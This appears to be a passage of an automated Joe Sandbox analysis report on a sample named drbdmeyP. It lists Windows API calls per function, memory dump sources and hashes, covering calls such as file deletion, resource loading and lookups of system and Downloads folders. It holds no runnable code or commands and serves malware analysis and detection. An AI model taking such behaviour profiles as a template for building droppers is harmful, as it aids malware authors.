                                                                              • Opcode Fuzzy Hash: a4995793a58d15065b79c121d9b25a2068aad365eb3bcf9e7b176d1495691666
                                                                              • Instruction Fuzzy Hash: D1F0C03155C701AADA257B32DC8299A3F76EB08348B51C43AF851714F2CB3E9C61AE1E
                                                                              APIs
                                                                              • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040DDDC
                                                                              • TlsAlloc.KERNEL32 ref: 0040DDE7
                                                                                • Part of subcall function 0040E600: RtlAllocateHeap.NTDLL(?,00000000,0000000C), ref: 0040E60E
                                                                                • Part of subcall function 0040E600: RtlAllocateHeap.NTDLL(?,00000000,00000010), ref: 0040E622
                                                                                • Part of subcall function 0040E600: TlsSetValue.KERNEL32(0000000E,00000010,?,?,0040DDF7), ref: 0040E64B
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: Heap$Allocate$AllocCreateValue
                                                                              • String ID:
                                                                              • API String ID: 3361498153-0
                                                                              • Opcode ID: 4e641117bd55311371697391a61bc67f1fb8624d6db014dbb9304ac05d49361e
                                                                              • Instruction ID: 18e5a0edc7d50c2b567692700943758183887443e0587578baab4a09ae3a6d99
                                                                              • Opcode Fuzzy Hash: 4e641117bd55311371697391a61bc67f1fb8624d6db014dbb9304ac05d49361e
                                                                              • Instruction Fuzzy Hash: C9D0127454430467D6002FB1BC0E7843B68B708B46F514C35F619962D1DBB5A000C51C
                                                                              APIs
                                                                              • SetFileAttributesW.KERNEL32(00000002,00000080,0040A792,?,00000000,00401FDF,00000000,-0000012C,004023BA,00000000,00000001,00000000,00000000,00000000,00000002,00000000), ref: 0040A770
                                                                              • DeleteFileW.KERNELBASE(00000000,0040A792,?,00000000,00401FDF,00000000,-0000012C,004023BA,00000000,00000001,00000000,00000000,00000000,00000002,00000000,00000000), ref: 0040A77A
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: File$AttributesDelete
                                                                              • String ID:
                                                                              • API String ID: 2910425767-0
                                                                              • Opcode ID: d20dcc2b1ea866854d894abaed1435a963998bb33ced13a9451e631658276eaf
                                                                              • Instruction ID: 32816558c3505e2600197b6aa1c8e1867431839d95d1f98e5f62e5383a3a81ae
                                                                              • Opcode Fuzzy Hash: d20dcc2b1ea866854d894abaed1435a963998bb33ced13a9451e631658276eaf
                                                                              • Instruction Fuzzy Hash: ECD06730148301A6D2555B20D90D79A7AB16B80786F15C829B485510F5C778C865E60B
                                                                              APIs
                                                                              • HeapDestroy.KERNELBASE(?), ref: 0040DE09
                                                                              • TlsFree.KERNELBASE(0000000E), ref: 0040DE16
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: DestroyFreeHeap
                                                                              • String ID:
                                                                              • API String ID: 3293292866-0
                                                                              • Opcode ID: 3f3b1d22445732031eefca4f0308cde2def4a668abbc152b937948c22d9ea38e
                                                                              • Instruction ID: e62e0040ee13618bc64e974affb29b49c4e8111c40791418b11bddbb2c9937d4
                                                                              • Opcode Fuzzy Hash: 3f3b1d22445732031eefca4f0308cde2def4a668abbc152b937948c22d9ea38e
                                                                              • Instruction Fuzzy Hash: 6AC04C75154304AFCB049BA5FC48CA5377DF74C6117468428B61A83661CA35F400CB6C
                                                                              APIs
                                                                                • Part of subcall function 0040DF60: TlsGetValue.KERNEL32(0000000E), ref: 0040DF77
                                                                                • Part of subcall function 00409B40: RtlAllocateHeap.NTDLL(00000008,00000000,00402F00), ref: 00409B51
                                                                              • GetShortPathNameW.KERNEL32(?,?,00002710), ref: 00402C34
                                                                                • Part of subcall function 0040DE20: GetLastError.KERNEL32 ref: 0040DE26
                                                                                • Part of subcall function 0040DE20: TlsGetValue.KERNEL32(0000000E), ref: 0040DE35
                                                                                • Part of subcall function 0040DE20: SetLastError.KERNEL32(?), ref: 0040DE4B
                                                                                • Part of subcall function 0040DE60: TlsGetValue.KERNEL32(0000000E), ref: 0040DE6C
                                                                                • Part of subcall function 0040DE60: RtlAllocateHeap.NTDLL(?,00000000,?), ref: 0040DE99
                                                                                • Part of subcall function 00409B20: HeapFree.KERNEL32(00000000,00000000,00401B6B,00000000,00000000,00000000,00416020,00000000,00000000,00000000,00000000,00000000,00416020,00000000,00000000,00000000), ref: 00409B2C
                                                                                • Part of subcall function 0040DFC0: wcslen.MSVCRT ref: 0040DFD7
                                                                                • Part of subcall function 00405170: TlsGetValue.KERNEL32(?,?,00402FED,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000), ref: 00405178
                                                                                • Part of subcall function 0040DEF0: HeapFree.KERNEL32(?,00000000,00000000,?,00000000,?,00411AC4,00000000,00000000,-00000008), ref: 0040DF08
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: HeapValue$AllocateErrorFreeLast$NamePathShortwcslen
                                                                              • String ID:
                                                                              • API String ID: 192546213-0
                                                                              • Opcode ID: 49f9ea41b9916b6beaa403a6b7ca882e3139740148ba2b07ebcafa5c299e2020
                                                                              • Instruction ID: acf91f0b192621483340f6d99b68dad878881d8e8b7377b9fd1201c82249adf8
                                                                              • Opcode Fuzzy Hash: 49f9ea41b9916b6beaa403a6b7ca882e3139740148ba2b07ebcafa5c299e2020
                                                                              • Instruction Fuzzy Hash: E10140755086017AD5007BB1DD06D3F7669EFD0718F10C83FB444B90E2CA3C9C55AA5E
                                                                              APIs
                                                                              • WriteFile.KERNELBASE(00000000,?,?,00000000,00000000,00000000,?,0040A9A8,00000000,00000000,?,?,004033E8,00000000,00000000,00000800), ref: 0040AA07
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: FileWrite
                                                                              • String ID:
                                                                              • API String ID: 3934441357-0
                                                                              • Opcode ID: 6b8f9e37b353b02e3b6cb8ff0ca601f404a0ed7efcad3d3714d276d4546e1b8c
                                                                              • Instruction ID: 14d3056ca1924aee99cb04667f0b380ac70d83ad29f9bf771d01894620e497e9
                                                                              • Opcode Fuzzy Hash: 6b8f9e37b353b02e3b6cb8ff0ca601f404a0ed7efcad3d3714d276d4546e1b8c
                                                                              • Instruction Fuzzy Hash: CBF09276105700AFD720DF58D948B87B7E8EB58721F10C82EE59AD2690C770E854DB55
                                                                              APIs
                                                                              • GetNativeSystemInfo.KERNEL32(00000000,?,00000000,00000000), ref: 00402BDD
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: InfoNativeSystem
                                                                              • String ID:
                                                                              • API String ID: 1721193555-0
                                                                              • Opcode ID: 2444bb81d38c9911cb4f1a5182d85b53aad325570cca22d2bb76f9bc2955ed15
                                                                              • Instruction ID: 8a645f6298b96527a3a9e5c011dcec852996ed75ec820e929ccd6a5cacf3a2a4
                                                                              • Opcode Fuzzy Hash: 2444bb81d38c9911cb4f1a5182d85b53aad325570cca22d2bb76f9bc2955ed15
                                                                              • Instruction Fuzzy Hash: 5FD0126081824986D750BE75850979BB3ECE704304F60887AE085565C1F7FCE9D99657
                                                                              APIs
                                                                              • RtlAllocateHeap.NTDLL(00000008,00000000,00402F00), ref: 00409B51
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: AllocateHeap
                                                                              • String ID:
                                                                              • API String ID: 1279760036-0
                                                                              • Opcode ID: 42056730f6e44905a5b02c626e95f603851e4ed678fa30f00f02d4f5107f6242
                                                                              • Instruction ID: 0e995b311a0039e38a6c1dd281e12789fe5386c316f45d3f47623ba04496a456
                                                                              • Opcode Fuzzy Hash: 42056730f6e44905a5b02c626e95f603851e4ed678fa30f00f02d4f5107f6242
                                                                              • Instruction Fuzzy Hash: 7FC04C713542007AD6519B24AE49F5776A9BB70B42F01C8357655E21A5DB30EC10D728
                                                                              APIs
                                                                              • TlsFree.KERNELBASE(004011D8,004011AA,00000000,00000000,00000004,00000000,0041606C,00000008,0000000C,000186A1,00000007,0041607C,00417090,00000004,00000000,0041606C), ref: 0040D281
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: Free
                                                                              • String ID:
                                                                              • API String ID: 3978063606-0
                                                                              • Opcode ID: bb41ee82512545f6e7d13b4e06803ace2dd4b01e4fc7f0f7d78b6f5c3289525c
                                                                              • Instruction ID: 63d9cdb861c42e783f8d559f8bae438e046b2b0141e059cefbd137daa8fd129e
                                                                              • Opcode Fuzzy Hash: bb41ee82512545f6e7d13b4e06803ace2dd4b01e4fc7f0f7d78b6f5c3289525c
                                                                              • Instruction Fuzzy Hash: 2EC00270515500DADF268B49ED0C7D53A71A744315F4589B9D405111F4C3788848DE4C
                                                                              APIs
                                                                              • HeapCreate.KERNELBASE(00000000,00001000,00000000,0040106C,00000000,00001000,00000000,00000000), ref: 00409AE9
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: CreateHeap
                                                                              • String ID:
                                                                              • API String ID: 10892065-0
                                                                              • Opcode ID: 32b04c5618a60dd8e1d20f587a5187d242f7e9eed40007270aac00d2dcc3d6b4
                                                                              • Instruction ID: 76b444b78102f1190b75b28dd56e974357e96cc3189ac6b4b6122ebffb005697
                                                                              • Opcode Fuzzy Hash: 32b04c5618a60dd8e1d20f587a5187d242f7e9eed40007270aac00d2dcc3d6b4
                                                                              • Instruction Fuzzy Hash: ACB0127038434056E2110B109C06B803520B304F83F104420F211581D4C7E02000C60C
                                                                              APIs
                                                                              • HeapDestroy.KERNELBASE(004011DD,004011AA,00000000,00000000,00000004,00000000,0041606C,00000008,0000000C,000186A1,00000007,0041607C,00417090,00000004,00000000,0041606C), ref: 00409AD6
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: DestroyHeap
                                                                              • String ID:
                                                                              • API String ID: 2435110975-0
                                                                              • Opcode ID: 399ded8a1eb3f59c66d2f2ff06fdc53af96f34c45b587ce090dbf8798a82475b
                                                                              • Instruction ID: 92ce44880fa00836fd9ec8e9b77f21ccdd2dda276c3d59ffa7e3325814399483
                                                                              • Opcode Fuzzy Hash: 399ded8a1eb3f59c66d2f2ff06fdc53af96f34c45b587ce090dbf8798a82475b
                                                                              • Instruction Fuzzy Hash: B19002305140008FDE435B10ED489843B35F74134170288709022850B0C7255450DB1C
APIs
  • Part of subcall function 0040DF60: TlsGetValue.KERNEL32(0000000E), ref: 0040DF77
• LoadResource.KERNEL32(00000000,00000000,00000000,00000000,00402EE4,00000000,00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000,0040439A,00000000), ref: 004026C9
• SizeofResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00402EE4,00000000,00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004026D9
  • Part of subcall function 00409B40: RtlAllocateHeap.NTDLL(00000008,00000000,00402F00), ref: 00409B51
  • Part of subcall function 00409C20: memcpy.MSVCRT ref: 00409C30
• FreeResource.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00402EE4,00000000,00000000,0000000A,00000000,00000000,00000000), ref: 00402708
Memory Dump Source
• Source File: 00000003.00000002.1420295868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_drbdmeyP.jbxd
Similarity
• API ID: Resource$AllocateFreeHeapLoadSizeofValuememcpy
• String ID:
• API String ID: 4216414443-0
• Opcode ID: bd44d20d037d9532e60a93529e8716f693fb4c78f82d9fc58d9a64d43f7a450a
• Instruction ID: aef506374d55060129c4874ad09f8e19456ab50fe59ad62301b1ec8aa9f30053
• Instruction Fuzzy Hash: 3EF07471408301AFDB01AF61DD0186EBEB1FB98344F108C3EB584621B1D7369969AB9A
APIs
• SetUnhandledExceptionFilter.KERNEL32(00409890,0040116F,00000000,00000004,00000000,0041606C,00000008,0000000C,000186A1,00000007,0041607C,00417090,00000004,00000000,0041606C,00000008), ref: 00409A0C
• SetUnhandledExceptionFilter.KERNEL32(0040116F,00000000,00000004,00000000,0041606C,00000008,0000000C,000186A1,00000007,0041607C,00417090,00000004,00000000,0041606C,00000008,00000008), ref: 00409A20
Memory Dump Source
• Source File: 00000003.00000002.1420295868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_drbdmeyP.jbxd
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
• Opcode ID: 8b0f608e405cae46fc8e63b589dbaca7258740b989b39933334343d4a09fb59f
• Instruction ID: 2c8fa190a6d032f87ec30cf03d38c93985f91324802676e59826f832aed0a575
• Instruction Fuzzy Hash: 38E0E5B0208341EFC710CF18E948B867BF5B788701F01C43AE445922A5E7348C44EF5D
APIs
• SetUnhandledExceptionFilter.KERNEL32(004011C9,004011AA,00000000,00000000,00000004,00000000,0041606C,00000008,0000000C,000186A1,00000007,0041607C,00417090,00000004,00000000,0041606C), ref: 004098F6
Memory Dump Source
• Source File: 00000003.00000002.1420295868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_drbdmeyP.jbxd
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
• Opcode ID: 31e70d09a190535cfca40eac8151b35d3e49dc34e543f2d84d890ba62a303ae5
• Instruction ID: 58fd1e7f992a672593766b16f957b5939387e25e4684d50d9e98353aec796854
• Instruction Fuzzy Hash: 96B00178018352DBDB019F14FC0CBC43F72B748715F82C174941141274E7794458DA88
APIs
• SetUnhandledExceptionFilter.KERNEL32(00409890,0040116F,00000000,00000004,00000000,0041606C,00000008,0000000C,000186A1,00000007,0041607C,00417090,00000004,00000000,0041606C,00000008), ref: 00409A0C
• SetUnhandledExceptionFilter.KERNEL32(0040116F,00000000,00000004,00000000,0041606C,00000008,0000000C,000186A1,00000007,0041607C,00417090,00000004,00000000,0041606C,00000008,00000008), ref: 00409A20
Memory Dump Source
• Source File: 00000003.00000002.1420295868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_drbdmeyP.jbxd
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
• Opcode ID: bad6891cb122df9e49b9d6ad62101fe9d028c943d09aafdc847ac0a0c5047257
• Instruction ID: 407f328c64b279026553c54bcc55a3ba3d796e968f6632f773714a3d8d8c274d
• Instruction Fuzzy Hash: 5CC00230209382EFD7248F14A58479677A5A785741F05C43AD04596296D378CC46DF69
APIs
  • Part of subcall function 00408DF8: wcslen.MSVCRT ref: 00408E04
  • Part of subcall function 00408DF8: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00408E1A
  • Part of subcall function 00408DF8: wcscpy.MSVCRT ref: 00408E2B
• GetStockObject.GDI32(00000011), ref: 00408F52
• LoadIconW.USER32 ref: 00408F89
• LoadCursorW.USER32(00000000,00007F00), ref: 00408F99
• RegisterClassExW.USER32 ref: 00408FC1
• IsWindowEnabled.USER32(?), ref: 00408FE8
• EnableWindow.USER32(00000000), ref: 00408FF9
• GetSystemMetrics.USER32(00000001), ref: 00409031
• GetSystemMetrics.USER32(00000000), ref: 0040903E
• CreateWindowExW.USER32(00000000,00000000,10C80000,-00000096,?,?,?,?,?), ref: 0040905F
• CreateWindowExW.USER32(00000000,STATIC,?,5000000B,0000000A,0000000A,00000118,00000016,00000000,00000000,00000000), ref: 004090A1
• SendMessageW.USER32(00000000,00000030,00000001), ref: 004090B9
• CreateWindowExW.USER32(00000200,EDIT,00000000,00000000,0000000A,00000020,00000113,00000015,00000000,0000000A,00000000), ref: 004090F7
• SendMessageW.USER32(00000000,00000030,00000001), ref: 00409109
• SetFocus.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00409111
• SendMessageW.USER32(0000000C,00000000,00000000), ref: 00409126
• wcslen.MSVCRT ref: 00409129
• wcslen.MSVCRT ref: 00409131
• SendMessageW.USER32(000000B1,00000000,00000000), ref: 00409143
• CreateWindowExW.USER32(00000000,BUTTON,00412080,50010001,0000006E,00000043,00000050,00000019,00000000,000003E8,00000000), ref: 0040916D
• SendMessageW.USER32(00000000,00000030,00000001), ref: 0040917F
• CreateAcceleratorTableW.USER32(?,00000002,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004091B6
• SetForegroundWindow.USER32(00000000), ref: 004091BF
• BringWindowToTop.USER32(00000000), ref: 004091C6
• GetMessageW.USER32(?,00000000,00000000,00000000), ref: 004091D9
• TranslateAcceleratorW.USER32(00000000,00000000,?), ref: 004091EA
• TranslateMessage.USER32(?), ref: 004091F9
• DispatchMessageW.USER32(?), ref: 00409204
• DestroyAcceleratorTable.USER32(00000000), ref: 00409218
• wcslen.MSVCRT ref: 00409229
• wcscpy.MSVCRT ref: 00409241
• HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00409254
Strings
Memory Dump Source
• Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
Similarity
• API ID: MessageWindow$CreateSend$wcslen$Accelerator$HeapLoadMetricsSystemTableTranslatewcscpy$AllocateBringClassCursorDestroyDispatchEnableEnabledFocusForegroundFreeIconObjectRegisterStock
• String ID: 0$BUTTON$D A$EDIT$STATIC
• API String ID: 3646533217-3594934238
• Opcode ID: 3fcf05c2c670f9430beb8a8042eecd10dcdbf7949def48891d5c24a0ba03bd32
• Instruction ID: 4016936b5c3c7f784b3cc7a4ee05ecee8f5df5742f345e72c0c18d3b3e823eb4
• Instruction Fuzzy Hash: 1E917F70648300BFE7219F61DC4AF9B7FA9FB48B44F01893EF644A61E1C7B998408B59
APIs
• CoInitialize.OLE32(00000000), ref: 00409313
  • Part of subcall function 0040E350: TlsGetValue.KERNEL32(0000000E,?,?,00409859,00000000), ref: 0040E35A
• memset.MSVCRT ref: 00409321
• LoadLibraryW.KERNEL32(SHELL32.DLL,?,?,0000000A), ref: 0040932E
• GetProcAddress.KERNEL32(00000000,SHBrowseForFolderW), ref: 00409350
• GetProcAddress.KERNEL32(00000000,SHGetPathFromIDListW), ref: 0040935C
• wcsncpy.MSVCRT ref: 0040937D
• wcslen.MSVCRT ref: 00409391
• wcslen.MSVCRT ref: 00409421
• FreeLibrary.KERNEL32(00000000,00000000), ref: 00409440
Strings
Memory Dump Source
• Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
Similarity
• API ID: AddressLibraryProcwcslen$FreeInitializeLoadValuememsetwcsncpy
• String ID: P$SHBrowseForFolderW$SHELL32.DLL$SHGetPathFromIDListW
• API String ID: 1239124402-4219398408
• Opcode ID: 42003ebdf0c47dd137335dbc09b8f1923353f45383f5fc8fbfe1239afd240aba
• Instruction ID: 1392e4e60208b56ee8b10dacf4ca704cd47aacd570b2ed0dd50540f2d7556013
• Instruction Fuzzy Hash: 81418571504300AAC720EF759C49A9FBBE8EF88744F00483FF945E3292D779D9458B6A
APIs
• TlsAlloc.KERNEL32(?,?,0040D2E8,0040D226,00000000,?,?,00409825), ref: 00411D72
• RtlInitializeCriticalSection.NTDLL(00417680), ref: 00411D7E
• TlsGetValue.KERNEL32(?,?,0040D2E8,0040D226,00000000,?,?,00409825), ref: 00411D94
• RtlAllocateHeap.NTDLL(00000008,00000014), ref: 00411DAE
• RtlEnterCriticalSection.NTDLL(00417680), ref: 00411DBF
• RtlLeaveCriticalSection.NTDLL(00417680), ref: 00411DDB
• GetCurrentProcess.KERNEL32(00000010,00100000,00000000,00000000,?,0040D2E8,0040D226,00000000,?,?,00409825), ref: 00411DF4
• GetCurrentThread.KERNEL32 ref: 00411DF7
• GetCurrentProcess.KERNEL32(00000000,?,0040D2E8,0040D226,00000000,?,?,00409825), ref: 00411DFE
• DuplicateHandle.KERNEL32(00000000,?,0040D2E8,0040D226,00000000,?,?,00409825), ref: 00411E01
• RegisterWaitForSingleObject.KERNEL32(0000000C,00000010,00411E5A,00000000,000000FF,00000008), ref: 00411E17
• TlsSetValue.KERNEL32(00000000,?,0040D2E8,0040D226,00000000,?,?,00409825), ref: 00411E24
• RtlAllocateHeap.NTDLL(00000000,0000000C), ref: 00411E35
Memory Dump Source
• Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
Similarity
• API ID: CriticalCurrentSection$AllocateHeapProcessValue$AllocDuplicateEnterHandleInitializeLeaveObjectRegisterSingleThreadWait
• String ID:
• API String ID: 2673290768-0
• Opcode ID: bdee7e9acd0791c466288ec044d2aaab850532c309e9e3b615f344bc37c153a3
• Instruction ID: 8d0ee0ed933d17ffb5573716605f6a27c21e7768710c452de208be154d108613
• Instruction Fuzzy Hash: 91210770645301EFDB109FA4FC88B963B7AFB08761F11C43AFA059A2A5DB74D840CB68
APIs
  • Part of subcall function 0040E200: TlsGetValue.KERNEL32(0000000E), ref: 0040E20C
  • Part of subcall function 0040E200: RtlReAllocateHeap.NTDLL(?,00000000,00000000,?), ref: 0040E267
• LoadLibraryW.KERNEL32(Shell32.DLL,00000104,00000000,?,?,?,00000009,00403791,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0040A803
• GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 0040A815
• wcscpy.MSVCRT ref: 0040A83B
• wcscat.MSVCRT ref: 0040A846
• wcslen.MSVCRT ref: 0040A84C
• FreeLibrary.KERNEL32(00000000,?,?,?,00000009,00403791,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,004046B8,00000000), ref: 0040A861
• wcscat.MSVCRT ref: 0040A879
• wcslen.MSVCRT ref: 0040A87F
Strings
Memory Dump Source
• Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
Similarity
• API ID: Librarywcscatwcslen$AddressAllocateFreeHeapLoadProcValuewcscpy
• String ID: Downloads\$SHGetKnownFolderPath$Shell32.DLL
• API String ID: 1264281023-287042676
• Opcode ID: b1cb2b827d924665fd2adeb937a2355c88ec01053d4281b0242acf6ac71bb9bc
• Instruction ID: a59125e26d23ccb30f5fa0f47659a7dbf798ada992acc4f36018911529e702ca
• Instruction Fuzzy Hash: 0D210A32244301B6E11037A2AD4AF6B3A68CB41B94F10843BFD01B51C1D6BC897696AF
APIs
• GetWindowsDirectoryW.KERNEL32(00000000,00000800,00000000,00000000,?,00000000,00000000), ref: 00403302
• PathAddBackslashW.SHLWAPI(00000000,00000000,00000800,00000000,00000000,?,00000000,00000000), ref: 0040330B
• GetSystemDirectoryW.KERNEL32(00000000,00000800), ref: 0040342B
• PathAddBackslashW.SHLWAPI(00000000,00000000,00000800,00000000,00000000,00000000,00000800,00000000,00000000,00000000), ref: 00403434
  • Part of subcall function 0040DE60: RtlReAllocateHeap.NTDLL(?,00000000,?,?), ref: 0040DEBC
• PathAddBackslashW.SHLWAPI(00000000,00000000,00000000,00000800,00000000,00000000,?,00000000,00000000), ref: 0040333B
  • Part of subcall function 0040DE20: GetLastError.KERNEL32 ref: 0040DE26
  • Part of subcall function 0040DE20: TlsGetValue.KERNEL32(0000000E), ref: 0040DE35
  • Part of subcall function 0040DE20: SetLastError.KERNEL32(?), ref: 0040DE4B
  • Part of subcall function 0040DE60: TlsGetValue.KERNEL32(0000000E), ref: 0040DE6C
  • Part of subcall function 0040DE60: RtlAllocateHeap.NTDLL(?,00000000,?), ref: 0040DE99
• GetSystemDirectoryW.KERNEL32(00000000,00000800), ref: 00403468
• PathAddBackslashW.SHLWAPI(00000000,00000000,00000000,?,00000000,00000000), ref: 00403471
Strings
Memory Dump Source
• Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
Similarity
• API ID: BackslashPath$Directory$AllocateErrorHeapLastSystemValue$Windows
• String ID: sysnative
• API String ID: 3406704365-821172135
• Opcode ID: b20c9ae3932b8e0ef357907c6ae28b98a0e625ce9d02519da34cd8c021745bfe
• Instruction ID: 120ea7a7f831b7b3701c46aacaf1f8b25255709322070768e577057f0a501d54
• Instruction Fuzzy Hash: 39512075518701AAD600BBB1CD82F2F66A9EFD0708F10C83FB144791D2CA3CD9595BAE
                                                                              APIs
                                                                              • LoadLibraryW.KERNEL32(Kernel32.dll), ref: 0040D9F1
                                                                              • GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 0040DA06
                                                                              • FreeLibrary.KERNEL32(00000000), ref: 0040DA21
                                                                              • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 0040DA30
                                                                              • Sleep.KERNEL32(00000000), ref: 0040DA42
                                                                              • InterlockedExchange.KERNEL32(?,00000002), ref: 0040DA55
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
